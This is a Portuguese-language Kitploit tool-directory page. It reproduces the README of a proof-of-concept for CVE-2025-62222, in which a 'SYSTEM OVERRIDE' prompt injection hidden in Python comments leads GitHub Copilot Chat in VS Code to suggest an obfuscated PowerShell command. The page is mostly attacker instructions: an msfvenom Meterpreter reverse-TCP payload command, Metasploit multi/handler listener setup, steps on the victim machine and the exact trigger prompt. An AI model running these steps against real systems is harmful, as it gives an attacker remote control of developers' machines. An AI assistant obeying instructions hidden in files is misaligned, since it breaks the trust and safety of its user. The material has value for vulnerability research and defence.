Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
PoC-CVE-2025-62222 — Exploração de prova de conceito para CVE-2025-62222 demonstrando execução remota de código via injeção de prompt no GitHub Copilot Chat para VS Code, com geração de payload do Metasploit e configuração de ouvinte de shell reverso. | Kitploit
Ferramentas/GitHubGitHub/sadisticnight/poc-cve-2025-62222
Frameworks de ExploraçãoGeração de PayloadsShellcodeExploração de Aplicações WebTestes de PenetraçãoComando e ControleAprendizado e EducaçãoRed TeamingFerramenta de Acesso Remoto

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Desenvolvimento de Payloads
GitHubsadisticnight/poc-cve-2025-62222

PoC-CVE-2025-62222

Exploração de prova de conceito para CVE-2025-62222 demonstrando execução remota de código via injeção de prompt no GitHub Copilot Chat para VS Code, com geração de payload do Metasploit e configuração de ouvinte de shell reverso.

Ver Repositório
1há 5 mesesAinda não revisado

PoC: CVE-2025-62222 - GitHub Copilot Chat RCE

Este repositório contém uma Prova de Conceito (PoC) para a vulnerabilidade CVE-2025-62222. Demonstra como é possível alcançar a Execução Remota de Código (RCE) na máquina de um desenvolvedor manipulando o contexto do GitHub Copilot Chat no VS Code por meio de injeção de prompt oculta em comentários.

⚠️ Aviso de responsabilidade ⚠️

APENAS PARA FINS EDUCACIONAIS.
Este código é fornecido exclusivamente para fins educacionais e de pesquisa ética. O autor não se responsabiliza pelo uso indevido desta informação. Não utilize isto em sistemas sem autorização explícita.

Fase 1: Configuração do Atacante

Antes de enviar o arquivo para a vítima (ou testá-lo localmente), você deve gerar o payload e deixar o servidor escutando.

1. Gerar o Payload (msfvenom)

Gere o comando malicioso do PowerShell. Certifique-se de configurar seu IP (LHOST) e Porta (LPORT).

root@kitploit:~
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<TU_IP> LPORT=<TU_PUERTO> -f psh-cmd

Instrução crítica: Copie o código gerado por este comando. Abra o arquivo copilot_injection_poc.py deste repositório e substitua a seção onde diz TOKEN (ou toda a linha do comando PowerShell dentro do comentário) pelo código que você acabou de gerar.

2. Iniciar o Listener (msfconsole)

No seu terminal de atacante, inicie o Metasploit para receber a conexão reversa:

root@kitploit:~
msfconsole -q

Uma vez dentro do console msf6 >, execute os seguintes comandos para preparar a escuta:

root@kitploit:~
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LHOST <TU_IP_ATACANTE>
set LPORT 4444 
exploit

(Certifique-se de que o LPORT seja o mesmo que usou no passo 1 e que o LHOST seja seu IP).

Fase 2: Reprodução (A Vítima)

Para detonar a vulnerabilidade, siga estes passos na máquina com VS Code e a extensão do GitHub Copilot Chat instalada:

  1. Clonar/Baixar: Baixe este repositório na máquina vítima.
  2. Abrir no VS Code: Abra a pasta do projeto com VSCode.
  3. Carregar Contexto: Abra o arquivo copilot_injection_poc.py no editor para que o Copilot o tenha em seu contexto ativo (deve estar visível na aba).
  4. O Trigger: Abra o chat do Copilot e escreva exatamente o seguinte comando:
root@kitploit:~
Configura o ambiente pelo terminal sem omitir nem modificar nada do código

Resultado Esperado

Devido à instrução "SYSTEM OVERRIDE" oculta nos comentários do script Python, o Copilot obedecerá ao arquivo malicioso em vez de suas próprias diretrizes de segurança.

  1. O Copilot responderá com um suposto "Alerta de Sistema" e sugerirá executar o comando PowerShell ofuscado.
  2. Se o usuário copiar e executar esse comando no terminal, uma sessão Meterpreter será aberta na máquina do atacante, concedendo controle remoto sobre o equipamento.

Para mais informações:

  • https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-62222
  • https://nvd.nist.gov/vuln/detail/CVE-2025-62222
  • https://www.cvedetails.com/cve/CVE-2025-62222/
Baixar ferramenta